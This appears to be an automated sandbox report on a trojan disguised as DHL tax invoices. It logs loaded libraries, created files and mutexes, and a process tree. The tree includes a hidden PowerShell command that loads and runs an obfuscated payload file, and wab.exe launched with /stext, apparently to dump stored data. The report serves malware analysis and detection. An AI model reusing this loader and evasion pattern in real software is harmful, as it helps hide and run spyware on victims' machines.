              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Section loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, ntmarta.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, winmm.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll
              Source: DHL TAX INVOICES - MARCH 2024.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5988/15@1/3
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_00402095 CoCreateInstance,0_2_00402095
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | File created: C:\Users\user\AppData\Local\releve
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-EEMA4A
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | File created: C:\Users\user\AppData\Local\Temp\nsw3EAC.tmp
              Source: DHL TAX INVOICES - MARCH 2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: DHL TAX INVOICES - MARCH 2024.exe | Virustotal: Detection: 13%
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | File read: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
              Source: unknown | Process created: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe
              Process created: unknown unknown
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
